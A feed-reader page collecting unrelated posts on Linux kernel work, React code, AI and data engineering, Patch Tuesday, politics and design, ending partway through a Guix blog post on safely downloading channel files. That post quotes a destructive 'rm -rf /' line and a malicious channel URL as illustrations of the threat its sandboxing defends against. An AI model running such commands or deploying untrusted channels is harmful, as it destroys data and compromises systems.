I appreciate that X gave me back access to my account that I was locked out of, but they were apparently charging me for Premium when I couldn't use the account, and had no way to turn it off. Okay they can keep the money. But now I want to turn off Premium for the account I was using when I didn't have access to my real account, and can't find the commands to do that. Asked ChatGPT and it either hallucinated or X removed the command. So near as I can tell I now have two accounts on X that I'm paying $8 a month for Premium on.

15:21

[$] Managing pages outside of the direct map [LWN.net]

When Brendan Jackman proposed a session for the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, his topic was "a pagetable library for the kernel". During the actual memory-management-track session, though, he stated that the idea had "fizzled" and he was going to cover related topics instead. What resulted was a session on ways to efficiently manage pages that are not present in the kernel's direct map.

14:56

Link [Scripting News]

I'm screwing around with the JSONL stuff again. I'm interested in knowing about any work people have done that processes incoming JSONL data. I'd like to see if I'm even in the ballpark of something useful. Today I'm making it so that my app can be used in production to handle more than one stream. The key thing is that it's hooked up to FeedLand via a very simple JSON interface delivered in realtime via websockets. For feeds that support rssCloud, the appearance of the new item in the JSONL feed happens a fraction of a second after it was published. That's how fast the web of 2026 is.
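For context, the core of any incoming-JSONL processor is small: buffer chunks as they arrive, split on newlines, and parse each complete line, holding any trailing partial line until the next chunk. A minimal sketch, assuming a newline-delimited JSON stream arriving in arbitrary chunks (e.g. over a websocket); all names here are hypothetical, not FeedLand's actual interface:

```javascript
// Returns a function that accepts raw chunks of a JSONL stream and calls
// onItem() once per complete JSON record, tolerating records split across
// chunk boundaries.
function createJsonlParser(onItem) {
  let buffer = "";
  return (chunk) => {
    buffer += chunk;
    const lines = buffer.split("\n");
    buffer = lines.pop(); // keep any trailing partial line for next time
    for (const line of lines) {
      if (line.trim() === "") continue; // skip blank lines
      onItem(JSON.parse(line));
    }
  };
}

const items = [];
const feed = createJsonlParser((obj) => items.push(obj));
feed('{"title":"a"}\n{"ti'); // second record split mid-key
feed('tle":"b"}\n');
console.log(items.length); // 2
```

The buffering step is the part that matters in production: websocket frames and TCP chunks don't respect record boundaries, so a naive per-chunk `JSON.parse` will fail intermittently.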

14:35

[$] Revisiting mshare [LWN.net]

Linux can share memory between processes, but each process (almost always) has its own set of page tables. In situations where vast numbers of processes are sharing a memory region, the combined size of the page tables can exceed that of the shared memory itself. There has, thus, long been an interest in enabling unrelated processes to share page tables referring to shared memory. Anthony Yznaga is the latest developer to try to push this idea (known as "mshare") forward; he described the status of that work in a memory-management-track discussion at the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit (LSFMM+BPF).

Security updates for Wednesday [LWN.net]

Security updates have been issued by AlmaLinux (corosync, freerdp, git-lfs, glib2, jq, kernel-rt, krb5, libpng, libtiff, openexr, and thunderbird), Debian (exim4), Mageia (apache, perl-Gazelle, php, and sed), Slackware (expat), SUSE (assimp-devel, go1.26, libQt6Svg6, python-jupyterlab, raylib, thunderbird, tor, and trivy), and Ubuntu (exim4).

Sovereign Tech Fund invests in KDE [LWN.net]

The KDE project has announced that it has been awarded over €1 million from the Sovereign Tech Fund to improve its desktop-environment software. "The investment will be used to strengthen the structural reliability and security of KDE's core infrastructure, including Plasma, KDE Linux, and the frameworks underlying its communication services."

13:49

CodeSOD: Over and Under Reaction [The Daily WTF]

Today's anonymous submitter sends us two blocks. The first is a perfectly normal line of React code:

const [width, setWidth] = useState(false)

This creates a width variable, defaulting it to false, and a setWidth function, which lets React detect when you change the variable, and trigger a re-render. Importantly, this mutation only happens on the next render, which means if you call setWidth and then check width, you won't see your change happen.

As I said, this is perfectly normal React code. Well, almost. First, I have to ask: why on Earth is width being set to a boolean value? "How wide are you?" "Yes." It's possible that there's a good reason for this, though I suspect that it's unlikely.

The second issue, however, is that the linter complained that the setter was never actually used. That was odd because, when our submitter grepped the codebase, there were two calls to setWidth. Let's see what that looked like:

const show = (show) => {
    setWidth(show)
    setWidth(!show)
}

We create a function show, where we expect a boolean value, and then we setWidth with that value, and then with the negation of that value. So show(true) will set width to be false. To make matters more confusing, we set width both ways, and I assume this is someone trying to get around React's state management. React won't trigger a re-render if you set the state to a value it already has. So I suspect they're twiddling to try and force it to re-render, and I also suspect that this might not work? Even if it does, this isn't how you should be using React. As I said, I'm no React expert, but as the saying goes: "I don't have to be a helicopter pilot to know that when I see a helicopter hanging upside down from a tree someone messed up."
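React bails out of a re-render when the new state value is identical (by Object.is) to the current one, which is likely what the double-set is trying to fight. A plain-JavaScript sketch of that bailout rule, under a loud assumption: this is a simplified model, not React's actual implementation, which additionally batches updates inside event handlers, so the real behavior of two back-to-back calls may differ:

```javascript
// Simplified model of a state cell with a React-style same-value bailout.
// renders is a stand-in for "a re-render was scheduled".
function createState(initial) {
  let value = initial;
  let renders = 0;
  const set = (next) => {
    if (Object.is(value, next)) return; // same value: skip the re-render
    value = next;
    renders += 1;
  };
  return { get: () => value, set, renderCount: () => renders };
}

const width = createState(false);
const show = (s) => {
  width.set(s);  // the submitted pattern: set, then immediately negate
  width.set(!s);
};
show(true);
console.log(width.get());         // false: show(true) leaves width false
console.log(width.renderCount()); // 2: two renders for zero net change
```

Even in this charitable model, the pattern buys two state transitions for no net change; the idiomatic fix would be to pass the intended value once (or use a functional update) rather than ping-ponging to coax out a render.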

Our submitter writes:

Got hired to cleanup a mission critical website for a company that had just learned that offshore teams might not be worth the cost saving measures.

"Pay me now or pay me later."


13:28

Your AI Problem Is a Data Problem [Radar]

The other week I sat in a room full of data engineers worrying about AI automating them out of work, the same way auto manufacturing in Detroit was upended half a century ago.

All AI. All the time. That’s what technology professionals are talking about.

Data scientists, data engineers, and data architects are right to sound the alarm. Using AI to solve and automate data problems at the very beginning of the pipeline is an obvious use case for agentic engineering in data: shifting AI left for automation.

That looms as a threat to the data engineers who own the pipeline underlying the architecture and deliverables. It's a discussion we can no longer avoid. In every field, AI is looming, bringing with it new risks and bigger changes.

Introducing AI there can be dangerous, and that’s a conversation all its own. You hear horror stories about AI initiatives that failed—and what failed them.

Agentic frameworks stall because the retrieval layer can't be trusted. RAG pipelines work in demos, then fall apart in production. Problems that should have been solved upstream are instead patched over with governance tools downstream.

The conversation comes back to one thing. The data wasn’t ready.

Don’t neglect the data layer

A Cloudera and Harvard Business Review study from March 2026 found that only 7% of enterprises consider their data completely ready for AI, and over a quarter said it wasn’t ready at all. Another data point: In Informatica’s 2025 CDO Insights survey, 43% of organizations named data quality and readiness as their top obstacle to AI success. Not model performance. Not tooling. Data.

So why does this keep happening?

Organizations are treating AI as a technology procurement decision. Buy the platform, hire the engineers, deploy the models. But the foundation underneath those initiatives—the data layer—is missing.

The data wasn’t governed. The lineage wasn’t tracked. The pipeline was built for reporting, not for model consumption.

Because nobody owned the quality problem, when the model surfaced a confident, wrong answer, nobody could trace it back to find out why. The engineers in that room could easily be part of the solution.

That’s not an AI problem. That’s a data problem that AI made visible.

Readiness starts before the model

Data that feeds AI systems needs to be made consistent and owned. Not owned in the sense of having a name in a RACI chart. Owned in the sense that an engineer or data professional is accountable when it degrades. Lineage matters because AI outputs are only as auditable as the data behind them. Quality matters because model performance in production is directly correlated with what goes in.

These aren’t new principles. They’re established data engineering practices. They just haven’t been treated as AI deployment fundamentals. That needs to change.

Data readiness closes the gap between AI ambition and AI outcomes. McKinsey’s 2025 State of AI survey found that organizations investing in their data foundations first were likely to see real financial returns from AI. Without solutions like data contracts between producers and consumers, automated quality monitoring at the pipeline level, and governance frameworks that treat AI as a first-class data consumer rather than an afterthought, your AI spend will be wasted.
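As one illustration of the data contracts described above, a contract can be as simple as a shared, machine-checked schema enforced at the pipeline boundary, before records ever reach a model or retrieval layer. A minimal sketch; the field names and checks here are hypothetical:

```javascript
// A data contract: fields the producer promises and the checks the
// consumer relies on, validated per record at the pipeline boundary.
const contract = {
  fields: {
    customer_id: (v) => typeof v === "string" && v.length > 0,
    signup_date: (v) => !Number.isNaN(Date.parse(v)),
    lifetime_value: (v) => typeof v === "number" && v >= 0,
  },
};

// Returns a list of contract violations for one record (empty = passes).
function validate(record, contract) {
  const violations = [];
  for (const [field, check] of Object.entries(contract.fields)) {
    if (!(field in record)) violations.push(`missing field: ${field}`);
    else if (!check(record[field])) violations.push(`bad value for: ${field}`);
  }
  return violations;
}

const good = { customer_id: "c-1", signup_date: "2025-04-01", lifetime_value: 120.5 };
const bad = { customer_id: "", signup_date: "not a date" };
console.log(validate(good, contract).length); // 0
console.log(validate(bad, contract).length);  // 3
```

The point isn't the validation code, which is trivial; it's that producer and consumer agree on the checks explicitly, so a degrading feed fails loudly at the boundary instead of silently inside a model.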

Thinking back to that room a few weeks ago: data engineers who understand pipelines, lineage, and quality at depth aren't facing obsolescence. In fact, there's a good chance they'll soon see demand for their services spike, as organizations realize their AI initiatives aren't failing because they hired the wrong AI engineers. They likely failed because those organizations didn't invest in the data infrastructure and the engineers behind it.

The data engineering job isn’t going away. It’s changing shape as it solves a problem we’re all facing and talking about.

For data engineers, AI readiness is a table stakes deliverable now. That means owning the data that feeds AI systems, and building governance frameworks around what AI actually consumes. AI engineers, for their part, have to stop treating the data layer as someone else’s problem. When an agentic framework stalls or a RAG pipeline falls apart in production, the instinct is to look at the model or the retrieval architecture. The data is usually where the answer is. It behooves these two disciplines to share a definition of “done” that includes the data being ready before the model is deployed rather than after it fails.

The AI problem, for most organizations, is a data problem that can be solved by data engineers and data professionals. The sooner that lands in the boardroom, the better the odds that the next initiative doesn’t end up in the abandoned 42%.

12:14

OpenAI’s GPT-5.5 is as Good as Mythos at Finding Security Vulnerabilities [Schneier on Security]

The UK’s AI Security Institute evaluated GPT-5.5’s ability to find security vulnerabilities, and found that it is comparable to Claude Mythos. Note that the OpenAI model is generally available.

Here is the Institute’s evaluation of Mythos.

And here is an analysis of a smaller, cheaper model. It requires more scaffolding from the prompter, but it is also just as good.

10:28

The airplane oath [Seth's Blog]

You’re flying over Mount Rainier and a hole opens up in the bottom of your airplane. In that moment, you think hard about what you’ve done, what you’re doing, and what matters.

My friend Ty actually had this happen. In that moment, she decided to stop wasting her days on a career that pleased her family, and committed, if she survived, to quit and go build something that mattered to her.

Of course, in the months that followed, honoring the commitment was hard. If it were easy, she would have done it far sooner.

But it’s an oath. The sort of promise you don’t negotiate.

The really cool thing is that you don’t need to avoid a possible plane crash to wake up, see what’s going on in your life and take an oath. You can do it simply because it’s May 13th.

What a chance we each have. To take agency, to make a deal and to honor it. Don’t wait for an excuse to care enough to take an oath. Simply begin.

08:49

The Myriad [Penny Arcade]

New Comic: The Myriad

06:21

Girl Genius for Wednesday, May 13, 2026 [Girl Genius]

The Girl Genius comic for Wednesday, May 13, 2026 has been posted.

Tuesday, 12 May

23:56

Wheat crop failure in US [Richard Stallman's Political Notes]

Global heating has created a wheat crop failure in the US. *Temperature swings have left crops across the Plains in terrible conditions, with some farmers opting not to harvest.*

If we don't curb global heating, this will happen more and more often.

The nocebo effect is real [Richard Stallman's Political Notes]

The nocebo effect is real, just like the placebo effect.

According to one study, the nocebo effect seems to be responsible for around 3/4 of negative reactions to the Covid-19 vaccine.

One LLM good at finding exploits in software [Richard Stallman's Political Notes]

Reportedly one LLM is very good at finding exploits in software. People will need to fix them.

Another future LLM may be very good at finding exploits in tax systems. People will need to fix them, too.

UK nationalizing train operating companies [Richard Stallman's Political Notes]

The UK is really nationalizing the train operating companies, reversing one disastrous ideological decision made by the Tories decades ago.

Iranian human rights activist memoir [Richard Stallman's Political Notes]

Narges Mohammadi, Iranian human rights activist, wrote a memoir which describes beatings, solitary confinement, and denial of medical treatment. She is dying in prison, and those cruel state actions are part of the cause.

I wonder why the US persecutor hates the Iranian persecutors so much, given that he seems to be just fine with Russia's persecutor. He surely does not care any more about Iranians' human rights than about Americans' human rights. Perhaps this reflects Netanyahu's influence on him; perhaps he hates Iran's rulers because they persistently organize Shi'ites to oppose Israel on behalf of Palestinians.

Pardoned January 6 rioter sentenced for burglary [Richard Stallman's Political Notes]

*Pardoned January 6 rioter sentenced to seven years for Virginia burglary.*

The bullshitter launched the mob at the Capitol after preparing them with violent hatred, and arranged to make armed support hard for the Capitol police to obtain. In 2025, he pardoned all those who had been convicted for participating in the attack. There is no reasonable doubt that he arranged the attack intentionally and considers it an act of support for him. Justice calls for him to be convicted of the attack and sentenced to prison.

Datacenter planning documents mislead on greenhouse gas emissions [Richard Stallman's Political Notes]

Google datacenter planning documents misleadingly minimized the projected greenhouse gas emissions by a factor of five.

23:42

Link [Scripting News]

I have regained control of my Twitter account. I really missed it, truth be told. Thanks to Scoble for helping here. As he so often has.

23:35

Patch Tuesday, May 2026 Edition [Krebs on Security]

Artificial intelligence platforms may be just as susceptible to social engineering as human beings, but they are proving remarkably good at finding security vulnerabilities in human-made computer code. That reality is on full display this month with some of the more widely-used software makers — including Apple, Google, Microsoft, Mozilla and Oracle — fixing near record volumes of security bugs, and/or quickening the tempo of their patch releases.

As it does on the second Tuesday of every month, Microsoft today released software updates to address at least 118 security vulnerabilities in its various Windows operating systems and other products. Remarkably, this is the first Patch Tuesday in nearly two years in which Microsoft is not shipping any fixes for emergency zero-day flaws that are already being exploited. Nor have any of the flaws fixed today been previously disclosed (prior disclosure can give attackers a head start on how to exploit a weakness).

Sixteen of the vulnerabilities earned Microsoft’s most-dire “critical” label, meaning malware or miscreants could abuse these bugs to seize remote control over a vulnerable Windows device with little or no help from the user. Rapid7 has done much of the heavy lifting in identifying some of the more concerning critical weaknesses this month, including:

  • CVE-2026-41089: A critical stack-based buffer overflow in Windows Netlogon that offers an attacker SYSTEM privileges on the domain controller. No privileges or user interaction are required, and attack complexity is low. Patches are available for all versions of Windows Server from 2012 onwards.
  • CVE-2026-41096: A critical RCE in the Windows DNS client implementation worthy of attention despite Microsoft assessing exploitation as less likely.
  • CVE-2026-41103: A critical elevation of privilege vulnerability that allows an unauthorized attacker to impersonate an existing user by presenting forged credentials, thus bypassing Entra ID. Microsoft expects that exploitation is more likely.

May’s Patch Tuesday is a welcome respite from April, which saw Microsoft fix a near-record 167 security flaws. Microsoft was among a few dozen tech giants given access to “Project Glasswing,” a much-hyped AI capability developed by Anthropic that appears quite effective at unearthing security vulnerabilities in code.

Apple, another early participant in Project Glasswing, typically fixes an average of 20 vulnerabilities each time it ships a security update for iOS devices, said Chris Goettl, vice president of product management at Ivanti. On May 11, Apple shipped updates to address at least 52 vulnerabilities and backported the changes all the way to iPhone 6s and iOS 15.

Last month, Mozilla released Firefox 150, which resolved a whopping 271 vulnerabilities that were reportedly discovered during the Glasswing evaluation.

“Since Firefox 150.0.0 released, they have been on a more aggressive weekly cadence for security updates including the release of Firefox 150.0.3 on May Patch Tuesday resolving between three to five CVEs in each release,” Goettl said.

The software giant Oracle likewise recently increased its patch pace in response to its work with Glasswing. In its most recent quarterly patch update, Oracle addressed at least 450 flaws, including more than 300 fixes for remotely exploitable, unauthenticated flaws. But at the end of April, Oracle announced it was switching to a monthly update cycle for critical security issues.

On May 8, Google started rolling out updates to its Chrome browser that fixed an astonishing 127 security flaws (up from just 30 the previous month). Chrome automagically downloads available security updates, but installing them requires fully restarting the browser.

If you encounter any weirdness applying the updates from Microsoft or any other vendor mentioned here, feel free to sound off in the comments below. Meantime, if you haven’t backed up your data and/or drive lately, doing that before updating is generally sound advice. For a more granular look at the Microsoft updates released today, check out this inventory by the SANS Internet Storm Center.

23:00

Link [Scripting News]

This bit of code kept coming up, so I wanted to make it easier to find.

22:14

The anti-minimalist backlash is the bigger story behind Oxygen’s revival [OSnews]

A few weeks ago, we talked about a project within KDE to revive two of their classic themes, Oxygen and Air, and polish them up to make them usable on the current versions of KDE. The developers and designers working on this project say they’ve been utterly surprised by just how popular this news has proven to be, and Filip Fila published a blog post with some thoughts on this unexpected popularity. Why are people yearning so strongly for user interfaces from the past?

That’s the real story underneath the retro-yearning. It isn’t simply a story of people wanting their childhood from the 2000s back. It’s that a lot of ‘the new’ we’ve been offering doesn’t satisfy. It doesn’t have personality. It doesn’t feel warm. It doesn’t feel like it was made with the idea of being anything more than a clean product that gets the job done. The escapism towards the past is a symptom. A symptom of unmet needs, not mere sentimentality.

↫ Filip Fila

Fila uses modern architecture as an example, and I think it’s an apt one. While monumental modern architecture can easily be beautiful and striking, it’s the mundane buildings all around us that just don’t seem to elicit any positive emotions, no sense of belonging or safety. As Fila also notes, the decades-long swing to minimalism in both architecture and UI design isn’t merely because of a preference among designers, but also because minimalism is a hell of a lot cheaper to produce. A building with very little ornamentation and basic, straight lines is much easier, and thus cheaper, to design, construct, and maintain. The same applies to graphical user interface design.

There are some signs that the pendulum is starting to swing back towards more instead of less, in all aspects of design. More and more people are loudly demanding that buildings adopt more classical elements, and as we can all attest here on OSNews, the longing for aspects of UI design from the ’90s and early 2000s to make a return is strong. And not just among us deep in the weeds, either; I’ve lost count of the number of times I’ve seen normal people utterly confounded by modern UI design.

Anyway, bring back beveled edges.

21:28

05/12/26 [Flipside]

1 week left in my Kickstarter! Still trying to raise as much as I can for the next volume of my graphic novel! You can order any of the books!

https://www.kickstarter.com/projects/1016357068/flipside-graphic-novel-13th-volume

Google gives early peek at Android laptops: Googlebooks [OSnews]

The news that Google is working to move Chrome OS to the Android technology stack, and that it wants to start putting Android on laptops, is not exactly news, as the company has been talking about it for years. At an Android event today, the company finally unveiled the culmination of all this work: Googlebooks.

We’re bringing together the best of Android, which comes with powerful apps on Google Play and a modern OS that’s designed for Intelligence, and ChromeOS, which comes with the world’s most popular browser. The result is Googlebook: a new category of laptops built with Gemini’s helpfulness at its core, designed to work seamlessly with the devices in your life and powered by premium hardware. We’re sharing a sneak peek into the Googlebook experience today and will have a lot more to share later this year.

↫ Alex Kuscher at The Keyword, a Google blog apparently

The approach here seems very similar to Chromebooks, with Googlebooks being designed and built by various OEMs, but instead of Chrome OS they run Android in desktop mode. Of course, “AI” has been creamed all over these things, to the point where not even the venerable mouse cursor is safe: if you wiggle your cursor, it will turn into “Magic Pointer”, which will highlight various “AI” actions as you hover over stuff on your screen. Google also showed off an “AI”-based feature to create widgets, as well as the ability to access files on your phone right from a Googlebook.

That’s about all we know as far as functionality and features go. They’re supposed to go on sale later this year, with models coming from Acer, ASUS, Dell, HP, and Lenovo.

21:21

I Didn’t Even Know American Wisteria Was A Thing [Whatever]

Spring is in full swing here in Ohio and it has been both very beautiful and very allergy-inducing. One of the more beautiful aspects is that there is apparently a ton of American Wisteria wrapped around my pergola by the garage, and I find it to be extremely pretty. See for yourself:

A beautiful blossom of the American Wisteria, purple and clustered together into almost hydrangea like shapes.

This particular bloom is more open and blossomed than the others, hence why I took its photo. Before they bloomed, they all looked like tiny purple pinecones. I had no idea that they would open up into these beautiful flower clusters. I’m absolutely thrilled these are wrapped completely around my pergola. I notice their beauty every time I leave my house.

Very grateful to have some pretty purple flowers around.

Have you seen American Wisteria before? Perhaps you’ve seen the wisteria in Japan before? Let me know in the comments, and have a great day!

-AMS

19:07

[$] Using dma-bufs for read and write operations [LWN.net]

The kernel's dma-buf subsystem provides a way for drivers to share memory buffers, usually in order to support efficient device-to-device I/O. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, Pavel Begunkov, assisted by Kanchan Joshi, led a joint session of the storage and memory-management tracks to explore ways to make the use of dma-bufs more efficient yet, and to make them available for read and write operations initiated by user space.

17:35

Link [Scripting News]

Expanding items on a FeedLand blogroll should be consistently fast now. Just switched to a different server on the backend.

Burnout and Cognitive Debt [Radar]

Steve Yegge’s article about programmer burnout (“The AI Vampire”) along with Margaret Storey’s article about Cognitive Debt started an ongoing conversation about programmer fatigue and software quality—two topics that should be linked, but often aren’t. Steve argues that programming constantly with the help of agentic AI leads to burnout; it’s fast, it’s fun, but keeping up with your agents causes mental strain. He recommends programming with agents no more than 4 or 5 hours per day. I could cynically say that most software developers spend at most 20% of their time writing code, which leaves about an hour and a half for wrestling with agents—but that’s beside the point. Yegge’s point about burnout is important, and is in line with what friends have told me. At some point, you have to put the laptop down.

Storey makes a different point. Agentic engineering is great at creating software that works, but that you don’t quite understand. Like humans, agents can generate a lot of spaghetti code. They can “design” convoluted and inappropriate software structures—I hesitate to call them “architectures”; they’re what happens in the absence of architecture. Agents are very capable of creating technical debt—and not the kind of meaningful technical debt that lets you release a product on time with the knowledge that you will need to pay it back with interest. If nobody is looking hard at the code, the debt can grow without bounds, sort of like not checking your credit card balance. What’s worse—and this is Storey’s contribution—while that technical debt is growing, developers are losing track of the design, the structure, the architecture. She calls that “cognitive debt.” You don’t just have problems in the code; those problems are harder to find and fix than they should be because you’re unclear on the structure of the code you’re working with.

Other voices have made similar points. The Sonarsource blog writes about how AI is reshaping technical debt and creating new burdens, new kinds of toil. In “The Mythical Agent Month,” Wes McKinney links the problem of burnout to the introduction of “accidental complexity” and “agent scope creep,” while Tim O’Brien writes that while scope creep isn’t new, AI supersized its growth. And Addy Osmani writes about finding your parallel agent limit, coming to grips with what you’re capable of accomplishing without compromising your work or your life.

Cognitive debt and burnout aren’t new, alas. With or without AI, we’ve all stayed up to 4AM working on a bug that won’t go away or pursuing an interesting idea to its end. Sometimes that’s heroic, but AI threatens to turn it into a lifestyle. AI fatigue is real, as Siddhant Khare writes, and it’s something we need to talk about. When fatigued, it’s tempting to say “this works, it looks good, and it passes our tests” without considering how the code fits into the overall plan. With 10x code generation, you also get 10x the debt load, and that’s being optimistic. When the debt curve goes exponential, strategies for managing that debt are stressed past the breaking point.

The problem with cognitive debt is that it eventually makes new features and bug fixes difficult or impossible. The code has become so convoluted that it can’t be changed. I’ve certainly done that with hand-written code: added a feature without thinking enough about how the new code fit in, added some more code later, and then—when I needed to add a third feature—discovered that I’d created a problem that wouldn’t be simple to fix. The right stuff was there, but in the wrong places because I wasn’t thinking about the overall structure.

That’s a common enough problem with handwritten code; it’s almost always a problem with legacy code where the original developers and maintainers are no longer around. We need to realize that it’s also a problem with AI-generated code, which has been characterized as legacy code from the day it’s written. Somebody or something has to pay down the debt. As Storey writes, “velocity without understanding is not sustainable”: not for humans, not for machines. If you understand the structure of what you’re building, you can steer the AI away from creating a problem in the first place, or you can use it to author a fix. If you don’t understand the structure or can’t describe it to the AI, you’re lost.

Cognitive debt accumulates much more quickly when you’re burned out. Burnout has always been a problem for programmers, especially for those who really love programming: you stay up all night to solve a problem. And, while some programmers resist using AI to write code, those who use AI frequently find that it exacts the same toll: it’s hard to stop. It is its own kind of toil: toil that gives you a sense of accomplishment and fulfillment, but still leaves you empty.

Agents may not be subject to burnout, but the humans who control them are. Agents are quickly becoming more capable, but they still can’t maintain a sense of the shape and structure of a project over the long term. That’s our job. They can pay down technical debt, but only if properly guided; that’s also our job. And we won’t be able to do either if we’re burned out.

16:56

The Big Idea: Ada Hoffman [Whatever]

When it comes down to it, all humanity really has at the end of the day is our stories. Telling stories around the fire is a tale as old as humans themselves, and author Ada Hoffman expresses the importance of these stories, and the importance of being human, in the Big Idea for their newest novel, Ignore All Previous Instructions.

ADA HOFFMAN:

When I tell people the premise of Ignore All Previous Instructions, they often remark how it reminds them of real life these days. In Ignore, the characters live in a space colony on Callisto where a generative AI company owns everything – and where making art or telling stories, without the AI’s assistance, is strictly not allowed.

Certainly there are parallels between this dystopian premise and my life in 2026 – working as an adjunct for a university computer science department where the people in charge keep yelling about the “pivot to AI” and how terrible it will be if we don’t all get on board.

But I wrote Ignore in 2023.

Publishing is slow, and novelists write about current events at our own peril. In 2023, I could see which way the tech industry hype train was going, but there was no way to know if it would still be going that direction three years later. I hoped it wouldn’t be. I decided to write the story anyway and see how it landed, because the topic was so close to my professional expertise and so close to my heart.

Another part of the novel, even closer to my heart and equally timely, was the problem of queer self-expression and book bans.

In 2023, I was at an early stage in therapy. I was just starting to think back, in ways I hadn’t allowed myself before, about how some of my experiences growing up had shaped me. This included a lot of things, many of them not germane to this post, but it also included the experience of growing up queer without understanding that that’s what it was.

My gut told me that I needed to write about these experiences – more urgently than I had ever needed to write about anything before.

In 2023, we were already seeing book bans and “Don’t Say Gay” laws. I didn’t know if that trend was going to continue for three years, either. I hoped it wouldn’t. But I couldn’t help but look at that news and think of my own childhood. I eventually did find words and concepts for what I was experiencing, although not necessarily in the healthiest way. The generation after me was given so much more, in terms of words and ways of understanding themselves. It galled me to see reactionaries trying to take that away from them again.

When I put these two urgently emerging problems together, I could see that they had one big thing in common. They were both, at heart, about the deep human need to express one’s own feelings – and a powerful movement that threatened to take it away.

AI writing is not an expression of the genuine heartfelt thought or experience of a human. If it is carefully prompted to express a human’s heartfelt thought, then the thought comes from the human, not the AI. Research shows that the longer we use a generative AI, the less our own thoughts enter into it; instead, offloading our thinking onto an AI causes our own capacity for independent thought to atrophy. Given the fervor and urgency with which tech companies urge us to use AI for everything, one might be forgiven for suspecting that this atrophy is their goal.

Moreover, because it’s trained to predict the most likely continuation of a set of words, AI writing will always converge toward the most mainstream or most common way of looking at something. The mainstream of the training data – essentially, the whole Internet, plus all the published books that the tech companies could find – is not queer. Even without any deliberate censorship, the perspectives of queer people and other minoritized groups are less likely to be considered in an AI’s output. For the same reason, if the AI is deliberately prompted to represent a queer perspective, it will rely on broad averages and stereotypes – not the lived and felt experience of an individual human who is queer.

But in hard times like these, independent thought based on our own lived experience is exactly what we need. This is the skill that helps us to understand when something is not quite right, or doesn’t quite match the truth of our lives – whether it’s a structural injustice or something personal.

Ignore All Previous Instructions tells the story of characters who grow up caught in a system where their own thoughts and voices are not valued, and who find ways – determinedly and imperfectly – to tell their own stories regardless. If there’s one idea readers take away from the book, I hope it’s the beauty and power of storytelling in our own words – and the need to hold on to it in the face of an establishment which would rather our stories weren’t told.


Ignore All Previous Instructions: Amazon|Barnes & Noble|Bookshop

Author socials: Website|Bluesky

Read an excerpt.

16:00

Link [Scripting News]

Masto, Twitter: I'd like to come up with a list of formats, protocols and products that have become defaults for AI work.

14:35

Time travel without borders [Planet GNU]

When offered the option to run other people’s code, a prime consideration is often ease of deployment. While much progress has been made in support of rapid deployment, the security implications of those quick deployments is often overlooked. In this post, we look at a new feature of guix time-machine and guix pull in support of one-line deployment commands: the ability to download channel files, but without compromising on security.

Sharing code

The normal workflow to share software and make it easily deployable with Guix goes like this: someone puts their packager hat on and writes a package definition, adds it to Guix proper or to a separate channel, at which point anyone can fetch the relevant channel(s) and deploy the software.

As an example, let’s assume you want to run yt-dlp as packaged in the latest Guix revision without upgrading your system or going through an explicit installation step. The simplest way to do that is with this command:

guix time-machine -q -- shell yt-dlp -- yt-dlp …

If you’re familiar with Nix, this is equivalent—with some important differences we’ll discuss below—to this command:

nix shell nixpkgs#yt-dlp --command yt-dlp …

In both cases, we’re fetching the latest revision of the package collection (the master branch for Guix, the nixpkgs-unstable branch of Nixpkgs for Nix) and running yt-dlp from there. (nix run goes one step further by removing the need to specify the command name.)

Now, that was an easy example because yt-dlp comes from Guix itself. What if you’d like to deploy an application that’s in another channel such as Guix-Science? Well, you would first need to come up with a channels.scm file for Guix-Science and then you can pass it to guix pull or guix time-machine:

$EDITOR channels.scm
# Make sure that includes Guix-Science.
guix time-machine -C channels.scm -- shell …

If you’re lucky, perhaps you can download a channel file. For example, Cuirass produces them for all successfully-evaluated commits, so you can fetch one for Guix-Science and go from there:

wget -O channels.scm \
  https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
guix time-machine -C channels.scm -- shell …

You can even do it in a single command using Bash process substitution!

guix time-machine \
  -C <(wget -O - https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science) \
  -- shell …

Is it a good idea though?

The threat

If you look more closely, the nix shell command and the last two guix time-machine commands have a bit of a curl | sh flavor to them: downloading arbitrary code and running it without further ado. All nix shell does is authenticate github.com, through HTTPS, and likewise for wget—that you’re downloading from the genuine github.com doesn’t tell you anything about the trustworthiness of the code you’re running.

In the case of Guix, the channels.scm you’re downloading could very well read this:

(system* "rm" "-rf" "/")  ;uh-oh!

Here system*, as you might have guessed, invokes a command. Because yes, channel files can contain arbitrary Scheme code! (It’s worth noting that this particular problem is one Nix doesn’t have: Nix being a domain-specific language (DSL) already limits what Nix code can do, especially with so-called “pure” evaluation.)

Or it could read something like this:

(list (channel
        (name 'guix)
        ;; This is Mallory’s malicious Guix, now you’re PWND!
        (url "https://example.org/EVIL/guix.git")
        (branch "master")
        (introduction
         (make-channel-introduction
          "badc0ffeed807b096b48283debdcddccfea34bad"
          (openpgp-fingerprint
           "DEAD CABB A99E F6A8 0D1D  E643 A2A0 6DF2 A33A BADD")))))

In this case, the channel file looks good, but the channel you’ll fetch—probably not so much.

So no: downloading a channel file and using it without checking it is not reasonable.

The cake

Can we have our cake and eat it too? Can we casually download someone else’s channel file without putting our system at risk?

Changes that have just landed in guix pull and guix time-machine aim to address these seemingly contradictory needs. The two commands are now equipped to download by themselves: just pass them a URL with the -C (or --channels) option.

guix time-machine \
  -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master \
  -- …

Crucially, this command is not equivalent to the naïve -C <(wget -O …) trick we saw above.

First, channel code is now evaluated in a “sandbox”: it can only access a predefined set of bindings, cannot import additional modules, and it must run in a limited amount of time and with a limited amount of memory allocated. This still provides access to many general-purpose facilities but blocks anything that could be used to alter the system state, exfiltrate data, or cause a denial of service.

With this in place, evaluating a channel file can be considered safe. Now, one problem remains: the file might list channels that I as a user do not trust. And here we see a tension between fetching channel files from out there and keeping one’s system safe. To address that, we define a new rule: only trusted channels may be deployed; if a channel file lists untrusted channels, guix pull and guix time-machine error out. Trusted channels are defined as follows:

  • they are those listed in ~/.config/guix/trusted-channels.scm, if it exists—this file lists channels just like a regular channel file;
  • or, they are the channels currently in use, as returned by guix describe.
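For illustration, a trusted-channels file uses the same Scheme syntax as a regular channel file. A hypothetical ~/.config/guix/trusted-channels.scm might read as follows (the channel name, URL, commit, and fingerprint here are placeholders, not a real channel):

```scheme
;; ~/.config/guix/trusted-channels.scm
;; Channels listed here may be deployed by ‘guix pull -C URL’ and
;; ‘guix time-machine -C URL’ when they appear in a downloaded channel file.
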